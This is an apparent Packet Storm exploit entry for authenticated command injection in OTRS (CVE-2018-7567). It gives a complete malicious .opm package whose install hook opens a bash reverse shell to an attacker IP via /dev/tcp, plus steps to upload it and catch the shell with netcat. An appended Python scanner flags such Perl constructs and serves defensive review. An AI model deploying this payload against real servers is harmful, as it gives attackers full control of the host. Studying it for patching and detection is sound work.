packetstorm | Ali BawazeEer | PACKETSTORM:146639
History: Mar 03, 2018 - 12:00 a.m.

OTRS Command Injection

2018-03-03 00:00:00
Ali BawazeEer
packetstormsecurity.com

EPSS: 0.004 (Low), percentile 73.3%

`# Exploit Title: OTRS Authenticated file upload   
# Date: 03-03-2018  
# Exploit Author: Ali BawazeEer   
# Vendor Homepage: https://www.otrs.com/  
# Software Link: http://ftp.otrs.org/pub/otrs/  
# Version:5.0.2, 5.0.0 - 5.0.24, 6.0.0 - 6.0.1  
# Tested on: OTRS 5.0.2/CentOS 7.2.1511  
# CVE : CVE-2018-7567  
  
# Vulnerability Description:   
Authenticated admins are able to exploit a blind remote code execution vulnerability by loading a crafted malicious opm file with an embedded CodeInstall tag, which executes a command on the server during package installation.  
- Proof opm file to upload  
  
<?xml version="1.0" encoding="utf-8" ?>  
<otrs_package version="1.1">  
<Name>MyModule</Name>  
<Version>1.0.0</Version>  
<Vendor>My Module</Vendor>  
<URL>http://otrs.org/</URL>  
<License>GNU GENERAL PUBLIC LICENSE Version 2, June 1991</License>  
<ChangeLog Version="1.0.1" Date="2006-11-11 11:11:11">My Module.</ChangeLog>  
<Description Lang="en">MyModule</Description>  
<Framework>5.x.x</Framework>  
<BuildDate>2016-09-23 11:17:41</BuildDate>  
<BuildHost>opms.otrs.com</BuildHost>  
<Framework>5.0.x</Framework>  
<IntroInstall Lang="en" Title="My Module" type="pre">  
<br>  
Hello wolrd  
<br>  
((Hello!))  
<br>  
</IntroInstall>  
<CodeInstall type="pre">  
print qx(bash -i >& /dev/tcp/192.168.56.102/443 0>&1 &);  
</CodeInstall>  
<CodeInstall Type="post">  
# create the package name  
my $CodeModule = 'var::packagesetup::' . $Param{Structure}->{Name}->{Content};  
$Kernel::OM->Get($CodeModule)->CodeInstall();  
</CodeInstall>  
<CodeUninstall type="pre">  
my $CodeModule = 'var::packagesetup::' . $Param{Structure}->{Name}->{Content};  
$Kernel::OM->Get($CodeModule)->CodeUninstall();  
</CodeUninstall>  
</otrs_package>  
  
  
- Steps:  
- Go to the package manager from the administrator panel  
- Save the above code in an opm file and upload it as a package  
- Change the IP address to your attacking machine and set up a netcat listener  
  
  
  
# =================================================EOF =======================================================  
#  
#  
# Risk: attackers are able to gain full access to the server after uploading a malicious opm file  
# and thus have total control over the web server.  
#  
# Vulnerability Limitation: admin access is needed to escalate privileges from the application level to control of the server  
#  
# ========================================================  
# [+] Disclaimer  
#  
# Permission is hereby granted for the redistribution of this advisory,  
# provided that it is not altered except by reformatting it, and that due  
# credit is given. Permission is explicitly given for insertion in  
# vulnerability databases and similar, provided that due credit is given to  
# the author. The author is not responsible for any misuse of the information contained   
# herein and prohibits any malicious use of all security related information  
# or exploits by the author or elsewhere.  
#  
#  
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #  
  
[+] Exploit by: Ali BawazeEer  
[+] Twitter:@AlibawazeEer  
[+] Linkedin : https://www.linkedin.com/in/AliBawazeEer  
`
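
For reviewing packages before they are handed to the package manager, the following check is an added example, not part of the original advisory or of OTRS: it extracts the Perl `Code*` sections from an .opm file and flags lines that spawn OS commands or open sockets. The rule set, the function names and the sample package are constructed assumptions.

```python
import html
import re

# Perl code sections the OTRS package format allows inside an .opm file.
CODE_TAGS = ("CodeInstall", "CodeUpgrade", "CodeUninstall", "CodeReinstall")
# Heuristic rules (assumed for this example, not an OTRS rule set) for Perl
# constructs that start an OS process or open a network channel.
SUSPICIOUS = {
    "qx": re.compile(r"\bqx\s*[^\w\s]"),
    "backticks": re.compile(r"`[^`]+`"),
    "system/exec": re.compile(r"\b(?:system|exec)\b\s*[(\"'@$]"),
    "/dev/tcp": re.compile(r"/dev/(?:tcp|udp)/"),
    "socket": re.compile(r"\bIO::Socket\b|\bsocket\s*\("),
}

# Constructed sample package: a harmless `id` call stands in for a payload.
SAMPLE_OPM = """<?xml version="1.0" encoding="utf-8" ?>
<otrs_package version="1.1">
<Name>ConstructedSample</Name>
<CodeInstall Type="pre">
print qx(id);
</CodeInstall>
<CodeInstall Type="post">
my $CodeModule = 'var::packagesetup::' . $Param{Structure}-&gt;{Name}-&gt;{Content};
$Kernel::OM-&gt;Get($CodeModule)-&gt;CodeInstall();
</CodeInstall>
</otrs_package>
"""

def extract_code_sections(opm_text):
    """Yield (tag, attrs, perl_code) per Code* section; regex-based so that
    packages which are not well-formed XML are still inspected."""
    pattern = re.compile(
        r"<(%s)\b([^>]*)>(.*?)</\1\s*>" % "|".join(CODE_TAGS), re.S)
    for m in pattern.finditer(opm_text):
        # Unwrap CDATA and decode entities so escaped Perl is matched too.
        code = re.sub(r"<!\[CDATA\[(.*?)\]\]>", r"\1", m.group(3), flags=re.S)
        yield m.group(1), m.group(2).strip(), html.unescape(code)

def scan_opm(opm_text):
    """Return a list of (tag, attrs, rule, line) findings."""
    findings = []
    for tag, attrs, code in extract_code_sections(opm_text):
        for line in map(str.strip, code.splitlines()):
            if not line or line.startswith("#"):
                continue  # skip blank lines and Perl comments
            findings += [(tag, attrs, rule, line)
                         for rule, rx in SUSPICIOUS.items() if rx.search(line)]
    return findings
```

Findings are triage signals only. Any Perl in these sections runs during package installation, so a clean result does not make a package safe, and installation rights should stay limited to trusted administrators.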
